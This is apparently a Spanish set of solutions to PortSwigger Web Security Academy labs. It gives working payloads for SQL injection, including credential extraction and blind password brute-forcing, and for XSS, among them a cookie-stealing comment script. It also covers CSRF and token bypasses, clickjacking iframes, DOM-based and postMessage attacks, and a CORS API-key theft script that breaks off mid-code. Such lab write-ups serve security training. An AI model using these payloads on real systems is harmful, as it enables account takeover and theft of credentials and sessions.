- SQL Injection
- Cross-site scripting
- Cross-site request forgery
- Clickjacking
- DOM-based vulnerabilities
- Cross-origin resource sharing
- Server-side request forgery
- HTTP request smuggling
- OS command injection
- Server-side template injection
- Directory traversal
- Access control vulnerabilities
- Authentication
- Information disclosure
- Business logic vulnerabilities
- HTTP Host header attacks
Cuando el usuario selecciona una categoría de productos en el sitio objetivo, se ejecuta la siguiente consulta SQL en el servidor (tomando como ejemplo la categoría Gifts):
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
Como el nombre de la categoría que se envía en la request no es sanitizado antes de incluirse en la consulta, esto permite que un atacante la manipule y ejecute una inyección SQL. Para resolver el laboratorio se debe hacer lo siguiente:
- Seleccionar una categoría en el sitio vulnerable y examinar la request interceptada en Burp Suite.
- En la sentencia GET, modificar el parámetro
category
para que devuelva todos los registros de la tabla. Esto se puede lograr colocando una comilla simple para cerrar el string luego deAccesories
(permitiendo insertar código SQL a continuación) y con una operaciónOR 1=1
, lo que devuelve siempretrue
. Finalmente, se agrega el operador--
, que comenta el resto de la consulta que está en el servidor. La petición debería quedar de la siguiente forma:
GET /filter?category=Accesories'OR+1=1-- HTTP/1.1
...
- Por último, se envía la request, y el laboratorio estará resuelto.
Cuando el usuario intenta iniciar sesión en el sitio objetivo, suponiendo que las credenciales utilizadas son usuario
y contraseña
, se ejecuta la siguiente consulta:
SELECT * FROM users WHERE username = 'usuario' AND password = 'contraseña'
Si no se sanitiza el parámetro del usuario, se puede iniciar sesión con cualquier cuenta mediante una inyección SQL. Para resolver el laboratorio se debe:
- Acceder a la página de Login del sitio vulnerable, e intentar iniciar sesión con valores de usuario y contraseña arbitrarios.
- En la request interceptada, en la última línea, donde se encuentra el token CSRF, se modifica el valor del parámetro
username
poradministrator'--
. Esto evita que se compruebe la contraseña, permitiendo iniciar sesión como dicho usuario. La petición debería quedar de la siguiente forma:
...
csrf=[token_csrf]&username=administrator'--&password=ramdom_characters
Cuando una aplicación es vulnerable a una inyección SQL y los resultados de la consulta se envían en la response, se puede usar el comando UNION
para recuperar datos de varias tablas, usando varias consultas. Para esto se deben cumplir dos condiciones: que las consultas devuelvan el mismo número de columnas, y que los tipos de datos en cada columna sean compatibles entre las consultas individuales.
Para determinar el número de columnas que devuelve una consulta, se puede inyectar ' UNION SELECT NULL--
, concatenando con varios NULL
hasta que el servidor no devuelva ningún error, indicando que se obtuvo el número correcto de columnas.
- Seleccionar una categoría en el sitio vulnerable.
- En la request interceptada, editar el valor del parámetro
category
para que contenga el siguiente valor:
category=Accesories'+UNION+SELECT+NULL--
- Como la consulta original no devuelve una columna, el servidor devuelve un código de error 500. Se debe concatenar otro
NULL
.
category=Accesories'+UNION+SELECT+NULL,NULL--
- Nuevamente volvió a dar error, entonces se debe volver a concatenar otro
NULL
hasta que no haya más error. - Finalmente con 3
NULL
no devolvió ningún error, lo que significa que la consulta original devuelve 3 columnas.
Normalmente, los datos interesantes obtenidos mediante una inyección SQL son strings, porlo que, una vez averiguado cuántas columnas devuelve, se debe evaluar cuáles de ellas contienen datos de tipo string. Esto se puede lograr enviando las siguientes cargas (suponiendo que la consulta devuelve 3 columnas):
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a',--
Cuando una response no devuelva error, quiere decir que la columna que contiene texto está dada por la posición del string de prueba 'a'
(que puede ser cualquier string). Para resolver este laboratorio se debe:
- Seleccionar una categoría de productos en el sitio vulnerable.
- Averiguar cuántas columnas devuelve la consulta original, tal como se vio en el laboratorio anterior (en este caso devuelve 3).
- Ahora se debe averiguar cuál de esas columnas es de tipo
VARCHAR
. Para eso, se debe reemplazar el primerNULL
por el string aleatorio brindado por el laboratorio (en mi caso fue'xw5KZ4'
). La consulta debería quedar así:
GET /filter?category=Accesories' UNION SELECT 'xw5KZ4',NULL,NULL-- HTTP/1.1
...
- Como dio error 500, se tiene que reemplazar el siguiente NULL, y así hasta dar con el correcto.
- Al segundo intento no dio problemas, por lo tanto, la segunda columna contiene datos de tipo
VARCHAR
.
Una vez que ya determiné el número de columnas devuelto por la consulta original, cuáles de ellas son de tipo string, y qué tablas y columnas contienen la información deseada, se pueden obtener los datos inyectando un código similar al siguiente:
' UNION SELECT username, password FROM users--
Suponiendo que la consulta devuelve dos columnas con strings, y que existe una tabla users
con dos columnas username
y password
. Para resolver este laboratorio se debe:
- Seleccionar una categoría de productos en el sitio vulnerable.
- En la request interceptada, primero averiguar cuántas columnas devuelve la consulta, y cuáles son del tipo
VARCHAR
. En este caso devuelve dos columnas, y ambas son de ese tipo (que sorpresa). - Ahora, para obtener todos los nombres de usuarios y contraseñas se inyecta la carga
'+UNION+SELECT+username,+password+FROM+users--
. La request queda con el siguiente formato:
GET /filter?category=Accesories'+UNION+SELECT+username,+password+FROM+users-- HTTP/1.1
...
- Finalmente, entre los productos mostrados en el sitio, estarán los nombres de usuarios con sus respectivas contraseñas.
En caso de que la consulta original devuelva una sola columna, se pueden concatenar los datos recuperados, incluyendo un separador para distinguir los distintos valores. Por ejemplo:
' UNION SELECT username || '~' || password FROM users--
El operador para concatenar varía según el motor de bases de datos que utiliza el servidor. Para resolver este laboratorio se debe:
- Seleccionar una categoría de productos del sitio vulnerable.
- En la request interceptada, averiguar cuántas columnas devuelve la consulta y cuál es del tipo
VARCHAR
. En este caso, la consulta original devuelve dos columnas, pero sólo la segunda es del tipoVARCHAR
. - Ahora, para recuperar los usuarios y contraseñas se deben concatenar ambos campos en una sola columna con el payload
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
. - Entre los productos mostrados por el sitio se listan los usuarios y contraseñas. Sólo resta iniciar sesión como administrator y listo.
En caso de suponer que el sitio vulnerable usa un motor de bases de datos Oracle, se puede usar un ataque UNION para obtener la versión del motor utilizado.
Se debe tener en cuenta que en Oracle todas las consultas SELECT
deben incluir un FROM
, aunque no se extraigan datos de ninguna tabla. Para eso se puede utilizar la tabla DUAL
. Para resolver este laboratorio se debe:
- Seleccionar una categoría de productos en el sitio vulnerable.
- En la request interceptada, averiguar cuántas columnas devuelve la consulta original, y cuáles de esas contienen strings, tal como se hizo en los laboratorios anteriores (en este caso devuelve dos columnas con strings).
- En Oracle se puede obtener la versión del motor con
SELECT BANNER FROM v$version
. Adaptando al escenario del laboratorio, el payload tendría esta forma:
category=Accesories'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
- Al final, se muestra el resultado entre los productos del sitio.
En el caso de una base de datos Microsoft SQL Server o MySQL, la técnica es prácticamente la misma que en el caso anterior, salvo que la consulta para obtener la versión es simplemente SELECT @@version
.
Como el laboratorio usa MySQL, para comentar se utiliza #
, ya que para usar --
se debe agregar un espacio al final.
- Seleccionar una categoría de productos en el sitio vulnerable.
- En la request interceptada, averiguar cuántas columnas devuelve la consulta original, y cuáles de esas contienen strings, tal como se hizo en los laboratorios anteriores (en este caso devuelve dos columnas con strings).
- El payload para obtener la versión es:
category=Accesories'+UNION+SELECT+@@version,+NULL#
- Al final, se muestra el resultado entre los productos del sitio.
La gran mayoría de los DBMS (menos Oracle) tienen una vista llamada information_schema
, que brinda información acerca de la base de datos, como los nombres de las tablas y columnas. La tabla information_schema.tables
contiene los nombres de todas las tablas, e information_schema.columns
los nombres de todas las columnas de todas las tablas. Para resolver el laboratorio se debe:
- Seleccionar una categoría de productos en el sitio vulnerable.
- En la request interceptada, averiguar cuántas columnas devuelve la consulta original, y cuáles son
VARCHAR
(otra vez devuelve dos columnas de ese tipo). - Para obtener los nombres de las tablas, usar el payload
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
en el parámetrocategory
. - Luego, se deben obtener los nombres de las columnas de las tablas que aparentan almacenar usuarios y contraseñas, usando el payload
'+UNION+SELECT+column_name,+NULL+FROM information_schema.columns+WHERE+table_name+=+'nombre_de_la_tabla'--
. - Después de probar con varias tablas, vi que
users_sdismv
es la que almacena las credenciales. Las columnasusername_rhprkn
ypassword_wwnrwq
guardan los datos buscados. - Sólo resta usar
'+UNION+SELECT+username_rhprkn,+password_wwnrwq+FROM+username_rhprkn--
e iniciar sesión con las credenciales deadministrator
.
En el caso de Oracle la operatoria varía ligeramente. Los nombres de las tablas se encuentran en all_tables
, y los de las columnas en all_tab_columns
. Para resolver el laboratorio se debe:
- Seleccionar una categoría de productos en el sitio vulnerable.
- En la request interceptada, averiguar cuántas columnas devuelve la consulta original, y cuáles son strings (otra vez devuelve dos columnas de ese tipo).
- Para obtener los nombres de las tablas, usar el payload
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
en el parámetrocategory
. - Luego, se deben obtener los nombres de las columnas de las tablas que aparentan almacenar usuarios y contraseñas, usando el payload
'+UNION+SELECT+column_name,+NULL+FROM all_tab_columns+WHERE+table_name+=+'nombre_de_la_tabla'--
. - Después de probar con varias tablas, vi que
USERS_TJPWIB
es la que almacena las credenciales. Las columnasUSERNAME_KJFHXT
yPASSWORD_HAQQFY
guardan los datos buscados. - Sólo resta usar
'+UNION+SELECT+USERNAME_KJFHXT,+PASSWORD_HAQQFY+FROM+USERS_TJPWIB--
e iniciar sesión con las credenciales deadministrator
.
Una blind SQL injection ("inyección SQL a ciegas") se da cuando una aplicación es vulnerable a una inyección SQL, pero la respuesta HTTP no contiene la respuesta de una consulta ni errores de la DB.
En este laboratorio, el sitio vulnerable usa una cookie de rastreo para realizar analítica. Al procesar una request, se ejecuta una consulta SQL para ver si el valor de la cookie corresponde a un usuario existente. En la response no se devuelve ningún resultado o error, pero el sitio muestra un mensaje de "Welcome back" si la consulta devuelve algún resultado, indicando que es un usuario conocido.
Para resolver este laboratorio se debe:
- Visitar la página principal del sitio vulnerable.
- Usando Burp, comprobar si existe un usuario
administrator
en la tablausers
. Para esto, al final de la request, al valor del parámetroTrackingId
agregar el payload'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'--
. - Como apareció el mensaje de Welcome back, quiere decir que ese usuario existe.
- Usando Burp Repeater, averiguar cuántos caracteres tiene la contraseña con el payload
'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)=1--
- Esto se debe hacer hasta que aparezca el mensaje Welcome back. Para ahorrar tiempo y esfuerzo, se puede hacer una búsqueda binaria o usar Burp intruder. En este caso, la contraseña tiene 20 caracteres.
- Usando Burp Intruder, averiguar uno por uno cuáles son los caracteres que conforman la contraseña. Para esto se usa el payload
'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,1,1)='a'--
y se configura Intruder de esta forma:- En la pestaña Positions, hacer clic en Clear §.
- Seleccionar la
a
y hacer clic en Add §. - En la pestaña Payloads, seleccionar Simple list, y debajo de Payload Options agregar todas las letras en minúscula y números (el laboratorio asume que la contraseña sólo contiene esos caracteres).
- En la pestaña Options, en la sección Grep - Match eliminar todas las entradas de la lista y agregar "Welcome back". Esto resalta las responses que contienen dicha frase.
- Iniciar el ataque y esperar a que aparezca un resultado que contenga Welcome back. El caracter que esté en la columna Payload es el que se encuentra en la contraseña.
- Ahora repetir el último paso para cada una de las 19 posiciones restantes, reemplazando el primer 1 por la posición correspondiente. Esto se automatizar usando un ataque del tipo Cluster bomb. En mi caso no funcionó, ya que luego de enviar 200 de 720 request, el laboratorio se reinició y todas empezaron a devolver error 504. Así que tuve que hacer manualmente.
- Una vez que se tenga la contraseña completa, iniciar sesión como administrator y listo.
Puede darse el caso de que la aplicación no varíe su comportamiento si la consulta arroja resultados o no. Pero si un error no tratado de la base de la datos (como una división por cero) cambia la response (por ejemplo, devolviendo un error), se puede aprovechar para utilizar una inyección SQL.
En este laboratorio no hay mensaje de "Welcome back", pero la response devuelve un error 500 Internal Server Error si falla la ejecución de la consulta. Para resolverlo se debe:
- Visitar la página principal del sitio vulnerable.
- Usando Burp, comprobar si existe un usuario
administrator
en la tablausers
. Para esto, al final de la request, al valor del parámetroTrackingId
agregar el payload'+UNION+SELECT+CASE+WHEN+(username='administrator')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--
. - Como la consulta devuelve un error 500, quiere decir que ese usuario existe.
- Usando Burp Intruder, averiguar cuántos caracteres tiene la contraseña con el payload
'+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+length(password)=1)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--
- Se selecciona el primer 1, se hace clic en Add §, y en Payload Options se agregan a la lista los números del 1 al 30. En este caso, la contraseña tiene 20 caracteres.
- Usando Burp Intruder, averiguar uno por uno cuáles son los caracteres que conforman la contraseña. Para esto se usa el payload
'+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+substr(password,1,1)='a')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--
y se configura de la misma forma que el laboratorio anterior, pero en Grep - Match se agrega "Internal Server Error". - Iniciar el ataque y esperar a que aparezca un resultado que contenga dicho error. El caracter que esté en la columna Payload es el que se encuentra en la contraseña.
- Ahora repetir el último paso para cada una de las 19 posiciones restantes, igual que en el laboratorio anterior.
- Una vez que se tenga la contraseña completa, iniciar sesión como administrator y listo.
El sitio objetivo tiene una vulnerabilidad en la función de búsqueda, no se realiza un control sobre los términos introducidos por el usuario, permitiendo que este ingrese texto arbitrario (incluyendo código malicioso). Además, el sitio retorna en la respuesta del mensaje HTTP enviado los términos de búsqueda introducidos por el usuario, lo que da lugar a un ataque del tipo "Reflected XSS".
Para resolver este lab, simplemente se escribe un script en el cuadro de búsqueda con el código malicioso a ejecutar (un alert
en el ejemplo):
<script>
alert('Hello World!');
</script>
https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded
<!-- In query text input -->
<img src="1" onerror="alert(document.domain)" />
'<img src="1" onerror=alert; throw document.cookie</img>'
El sitio objetivo tiene una vulnerabilidad en la sección de comentarios, que permite cargar código arbitrario que se ejecuta en el momento en que cualquier usuario ingresa a la publicación afectada.
Para resolver este lab, se ingresa como comentario de una públicación un script que se ejecutará cuando la víctima ingrese a la publicación, y generará un nuevo comentario con las cookies robadas a la víctima.
Por último, se debe cargar las cookies robadas en el navegador del atacante e ingresar al sitio objetivo para "ingresar" con las credenciales robadas.
<script>
document.addEventListener('DOMContentLoaded', function () {
let cookie = document.cookie;
let comment = document.getElementsByName('comment')[0];
comment.value = cookie;
let name = document.getElementsByName('name')[0];
name.value = '1337';
let email = document.getElementsByName('email')[0];
email.value = '[email protected]';
let website = document.getElementsByName('website')[0];
website.value = 'https://mywebsite.com';
let form = document.getElementsByTagName('form')[0];
form.submit();
});
</script>
El sitio objetivo tiene una vulnerabilidad en la sección de comentarios, que permite cargar código arbitrario que y ejecutarlo en el momento en que cualquier usuario ingresa a la publicación afectada. Además, en cada publicación hay un formulario para dejar comentarios que contiene un token CSRF válido, el cual puede ser utilizado para atravesar el control de CSRF.
Para resolver este lab, se escribe un Script que envía un mensaje HTTP, a la ubicación /email/change-email del sitio, con el método POST. En el cuerpo del mensaje, se incorpora el nuevo email y el token CSRF obtenido del formulario de comentarios.
<form action="/email/change-email" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input id="changeMe" required="" type="hidden" name="csrf" value="changeMe" />
</form>
<script>
document.addEventListener('DOMContentLoaded', (event) => {
let csrf = document.getElementById('changeMe');
let origCsrf = document.forms[1].getElementsByTagName('input')[0];
csrf.value = origCsrf.value;
document.forms[0].submit();
});
</script>
</script><script>alert(1)</script>
'; alert(1)//
Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
\'; alert(1)//
Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped
<!-- In Query text input -->
${alert(1)}
" autofocus onfocus="alert(document.domain)"
<svg width="120" height="120" viewBox="0 0 120 120" version="1.1" xmlns="http://www.w3.org/2000/svg">
<a>
<text x="10" y="25" width="100" height="100">
Hello
</text>
<animate attributeName="href" values="javascript://%0aalert(1)" />
</a>
</svg>
<!-- In Website section -->
javascript:alert("1337")
Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
<!-- In website section -->
'-alert(document.domain)-'
<form method="POST" action="https://aced1f971f5a2e0d80c321bf00e30015.web-security-academy.net/email/change-email">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="csrf" value="OQJBSyA28bY0ntWPuDdNcDhU0xN4zavJ">
</form>
<script>
document.forms[0].submit();
</script>
Al autenticarse y hacer click en Update Email con el interceptor de burp activado, si mandamos esta request al repeater e intentamos cambiar el csrf, vemos que bloquea la petición; en cambio, si cambiamos el método de la petición de POST a GET, vemos que el csrf ya no es validado. Para resolver el laboatorio completamos lo siguiente con la url del laboratorio (en la request de burp se puede hacer click derecho y copy url), teniendo en cuenta que el método de la request que no valida el csrf es GET.
<form method="GET" action="https://ac521fc91fe8eb95801f0a93002a00ab.web-security-academy.net/email/change-email?email=algo%40mail.com&csrf=algo1234">
<input type="hidden" name="email" value="algo@mail">
</form>
<script>
document.forms[0].submit();
</script>
Al autenticarse y hacer click en Update Email con el interceptor de burp activado, si mandamos esta request al repeater e intentamos cambiar el csrf, vemos que bloquea la petición; en cambio, si borramos el parámetro csrf, vemos que la petición es aceptada. Para resolver el laboatorio completamos lo siguiente con la url del laboratorio (en la request de burp se puede hacer click derecho y copy url).
<form method="POST" action="https://ac131f991ed1683b801644a1003000bf.web-security-academy.net/email/change-email">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
Elegimos una de las credenciales que da el laboratorio, nos autenticamos, y vamos a la sección Change email. Escribimos un email en el input y con el interceptor de burp activo hacemos click en Update email, copiamos el csrf de la petición interceptada y la droppeamos. Abrimos el laboratorio en una ventana de incógnito (copiar y pegar la misma url que la del laboratorio en marcha) y nos autenticamos con las otras credenciales provistas. Repetimos el procedimiento de la sección Change email con este usuario, pero ahora mandamos la petición interceptada al repeater. En el parámetro csrf de esta petición, pegamos el csrf que copiamos de la petición del usuario anterior, y vemos que al enviarla la request es aceptada.
Para resolver este laboratorio, completar lo siguiente con la url del mismo, y en el value del input correspondiente al csrf pegamos el token del otro usuario.
<form method="POST" action="https://ac201f8c1ff939c1805b0eba00ae0017.web-security-academy.net/email/change-email">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="csrf" value="pqQ4gmnNBtEPeGsFqDubfOTdqNEzhl7E">
</form>
<script>
document.forms[0].submit();
</script>
Caso muy similar al anterior, pero se explota la falta de protección csrf en la función de búsqueda para inyetar cookies en el navegaror de la víctima
<form method="POST" action="https://ac0f1f011f77ebbc80c6239100e400e0.web-security-academy.net/email/change-email">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="csrf" value="AC99lyKRB1kwqqNclxVT71NsvOYkhcjv">
</form>
<img src="https://ac0f1f011f77ebbc80c6239100e400e0.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=bPn9hLl0tvfI5hmsh7vnKuFh0auOpLjP" onerror="document.forms[0].submit()">
Autenticados en el laboratorio, ejecutamos la funcionalidad Change Email interceptando la request con burpsuite, y cambiando los valores del csrf del body y el de la cookie csrf, vemos que la validación simplemente consiste en comparar que un sea igual que el otro. Caso muy similar al anterior, también se explota la falta de protección csrf en la función de búsqueda para inyetar cookies en el navegaror de la víctima
<form method="POST" action="https://acfa1f351e61acce80a95395003a0017.web-security-academy.net/email/change-email">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="csrf" value="algo">
</form>
<img src="https://acfa1f351e61acce80a95395003a0017.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=algo" onerror="document.forms[0].submit()">
Autenticados en el laboratorio, ejecutamos la funcionalidad Change Email interceptando la request con burpsuite, y poniendo atención en el header Referer, notamos que si lo cambiamos, la request es rechazada, pero si la borramos, vuelve a ser aceptada. Para suprimir el header Referer incluimos la primera línea del siguiente exploit.
<meta name="referrer" content="no-referrer">
<form method="POST" action="https://ac7e1f411e7ba82f8084503a004700a7.web-security-academy.net/email/change-email">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
Analaizando la request de Change Email, vemos que solo acepta urls del dominio del laboratorio. Similar al laboratorio anterior, solo que esta vez alteramos el header Referer con la primera línea del script del siguiente exploit.
<form method="POST" action="https://acb91f5f1e79c23180f5059000d40092.web-security-academy.net/email/change-email">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
history.pushState("", "", "/?acb91f5f1e79c23180f5059000d40092.web-security-academy.net");
document.forms[0].submit();
</script>
Este laboratorio contiene un botón para eliminar la cuenta el cual está protegido por un token CSRF. La intención es hacer que un usuario haga click en un iframe con opacidad baja para que elimine su cuenta.
Para resolver este laboratorio, después de autenticarse con las credenciales provistas, dirigirse a Account Actions, y tomando esta url, la ponemos en el src del siguiente iframe.
<style>
iframe {
position: relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
div {
position: absolute;
top: 370px;
left: 60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://ac411f041eabd7098042860e00170056.web-security-academy.net/account"></iframe>
El objetivo del laboratorio es cambiar la dirección de correo electrónico del usuario rellenando previamente un formulario utilizando parámetros URL e intentar engañarlo para que haga click en un botón "Update Email" sin que el mismo sepa.
Para resolver este laboratorio, después de autenticarse con las credenciales provistas, dirigirse a Change Email, y tomando esta url, la ponemos en el src del siguiente iframe, seguido del parámetro email.
<style>
iframe {
position: relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
div {
position: absolute;
top: 560px;
left: 60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe
src="https://ac681f121f04aa6b80980439004b0021.web-security-academy.net/[email protected]"
></iframe>
Este laboratorio está protegido por un frame buster que evita que se ejecute un frame en el sitio web. El objetivo es evitar el frame buster y realizar un ataque clickjacking que ejecute un Update Email.
La solución a este laboratorio es la misma que el anterior, pero agregando el atributo sandbox="allow-forms" en el tag del iframe.
<style>
iframe {
position: relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
div {
position: absolute;
top: 510px;
left: 80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe
sandbox="allow-forms"
src="https://ac791f371e807c5c8070fc3c01b80050.web-security-academy.net/[email protected]"
></iframe>
Este laboratorio contiene una vulnerabilidad XSS que se activa con un click. El objetivo es construir un ataque de clickjacking para ejecutar un XSS payload que imprime un alert con el contenido de document.cookie.
Al ir a la sección Submit Feedback y enviar un formulario, vemos que se imprime el nombre, por lo que se puede buscar el XSS mediante el envío de dicho parámetro como se muestra a continuación:
<style>
iframe {
position: relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
div {
position: absolute;
top: 620px;
left: 80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe
src="https://acc01f561e12d7bb8043912700a00045.web-security-academy.net/feedback?name=<img src=1 onerror=alert(document.cookie)>&[email protected]&subject=alguno&message=hello#feedbackResult"
></iframe>
En este laboratorio se deben tener dos elementos en los que el usuario deberá hacer click uno antes que el otro, debido a que la intención es eliminar la cuenta del mismo, para lo cual deberá hacer un click primeramente para iniciar la acción de eliminar la cuenta, y luego otro click de confirmación para que la cuenta sea eliminada.
Para resolver este laboratorio, vamos a la sección Account Actions, copiamos la url y la pegamos en el src del siguiente iframe:
<style>
iframe {
position: relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
.first,
.next {
position: absolute;
top: 330px;
left: 50px;
z-index: 1;
}
.next {
left: 200px;
}
</style>
<div class="first">Click me first</div>
<div class="next">Click me next</div>
<iframe src="https://ac391f251e65efb180df32b2007d0066.web-security-academy.net/account"></iframe>
En este laboratorio el sitio vulnerable tiene un event listener message
con el siguiente código, el cual carga todo el contenido del mensaje en un div
con id ads
:
<script>
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
})
</script>
Para resolver el laboratorio, se debe cargar en el exploit server un iframe
, que al ser cargado envía un web message a la home del sitio vulnerable. El event listener inserta el contenido (es decir, una imagen) en ads
. Como la imagen tiene un src
inválido, se ejecuta el handler onerror
, que muestra las cookies.
<iframe src="https://id-del-laboratorio.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=alert(document.cookie)>','*')">
La home del sitio vulnerable tiene el siguiente event listener, que evalúa si en cualquier parte (no sólo al comienzo) del mensaje está el substring "http:"
o "https:"
. En caso afirmativo, lo guarda en location.href
<script>
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>
Para resolver el laboratorio se carga en el exploit server un iframe
que envíe un mensaje que alerte las cookies mediante Javascript, pero al final del mismo se agrega un comentario y la palabra http:
. Esto hará que se cumpla la condición del event listener, y al mismo tiempo no dará ningún error de sintaxis.
<iframe src="https://id-del-laboratorio.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:alert(document.cookie)//http:','*')">
El sitio vulnerable tiene un event listener que espera recibir un string que es parseado con JSON.parse()
. En el objeto parseado se espera que haya una propiedad type
que es evaluada en un switch
, y en caso de que tenga el valor 'load-channel'
se cambia el src
del iframe
al valor de la propiedad url
del mismo objeto.
<script>
window.addEventListener('message', function(e) {
var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
document.body.appendChild(iframe);
try {
d = JSON.parse(e.data);
} catch(e) {
return;
}
switch(d.type) {
case "page-load":
ACMEplayer.element.scrollIntoView();
break;
case "load-channel":
ACMEplayer.element.src = d.url;
break;
case "player-height-changed":
ACMEplayer.element.style.width = d.width + "px";
ACMEplayer.element.style.height = d.height + "px";
break;
}
}, false);
</script>
Para resolver el laboratorio se carga en el exploit server un iframe
, donde el contenido del mensaje sea un string que pueda ser parseado, y que tenga 2 atributos: type
(cuyo valor es "load-channel"
) y url
(cuyo valor es el código que se quiere inyectar).
<iframe src=https://id-del-laboratorio.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:alert(document.cookie)\"}","*")'>
Al ingresar en un posteo del sitio vulnerable, al final de todo hay un link que debería redirigir a la home. En caso de que returnUrl
tenga un valor truthy, se le asignará a location.href
el valor en la posición 1. Si no, se le asignará "/"
.
<a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = "/"">Back to Blog</a>
Para resolver el laboratorio, se debe armar una URL similar a la del posteo, pero que al final incluya otro query parameter url
, cuyo valor sea la URL del exploit server del laboratorio.
https://id-del-laboratorio.web-security-academy.net/post?postId=4&url=https://id-del-exploit-server.web-security-academy.net/
El sitio vulnerable usa una cookie llamada lastViewedProduct
, cuyo valor es la URL del último producto visitado, y se utiliza en un link dentro de la tienda.
Para resolver el laboratorio, se debe cargar un iframe
en el exploit server, cuyo source original es igual a la URL de uno de los productos, a menos que se agregue un payload Javascript al final. Cuando el iframe
carga por primera vez, el navegador abre temporalmente la URL maliciosa, que después se guarda como el valor de dicha cookie. El event handler de onload
redirige inmediatamente a la home, pero mientras la cookie siga estando envenenada, se va a ejecutar la payload cada vez que se visite la home.
<iframe src="https://id-del-laboratorio.web-security-academy.net/product?productId=1&'><script>alert(document.cookie)</script>" onload="if(!window.x)this.src='https://id-del-laboratorio.web-security-academy.net';window.x=1;">
La pagína de una entrada del blog importa el archivo loadCommentsWithDomClobbering.js
, el cual contiene el siguiente código:
let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
La variable defaultAvatar
es vulnerable a DOM clobbering, debido a que está definida con un operador OR y una variable global. Se puede vulnerar esto declarando dos tags a
con el mismo id, que hará que se agupen en una DOM collection. El name
del segundo a
es avatar
, y su href
es el código que se quiere inyectar. Pero el sitio vulnerable usa DOMPurify para mitigar los ataques DOM-based, por lo que el href
tendrá que usar el protocolo cid:
.
Para resolver el laboratorio se deben hacer dos comentarios en una entrada: uno que contenga el siguiente texto:
<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//">
Y otro que contenga cualquier cosa. Al volver a la entrada luego de postear el segundo comentario se va a ejecutar el alert
.
El sitio usa la librería html-janitor (vulnerable a DOM clobbering y otras cosas), que usa la propiedad attributes
para filtrar atributos HTML. Pero se puede vulnerar a dicha propiedad ahciendo que su length
sea indefinido. Esto permite inyectar cualquier atributo en un elemento HTML.
Para resolver el lab se debe realizar un comentario con el texto:
<form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>
Y después cargar en el exploit server:
<iframe src=https://id-del-lab.web-security-academy.net/post?postId=id-del-posteo onload="setTimeout(someArgument=>this.src=this.src+'#x',500)">
Cuando se carga el iframe
, después de medio segundo (para que se cargue el comentario antes de ejecutarse el JS), se agrega #x
al final de la URL, haciendo que se enfoque el elemento que tiene ese id (el form
creado en el comentario). Por último el event handler onfocus
hace que se ejecute la payload.
Al autenticarnos en este laboratorio e ir a la sección Account Details, vemos que se imprime el apikey. Yendo a burpsuite y analizando la petición y respuesta que se envían al entrar a esta sección, vemos que en el encabezado de la respuesta Access-Control-Allow-Credentials se devuelve el dominio de nuestro lab. Volviendo a la request y mandándola al repeater de burpsuite, si manualmente colocamos un encabezado Origin disitinto, el encabezado Access-Control-Allow-Credentials de la respuesta devolverá el dominio del origin.
Para resolver este lab, copiamos la url de la sección Home, y le anexamos "accountDetails" (debido a que a esta url se hacen las peticiones que devuelve la apikey, se puede ver analizando el HTTP History de burpsuite), y la pegamos en el siguiente script. Luego de pulsar el botón deliver exploit to victim, debemos ver las respuestas del servidor yendo a la sección Acces log. Una vez allí, buscamos "log?key", y lo que sigue será el apikey que debemos enviar.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac0d1f601f36270f80786122008800b8.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
var x = JSON.parse(this.responseText);
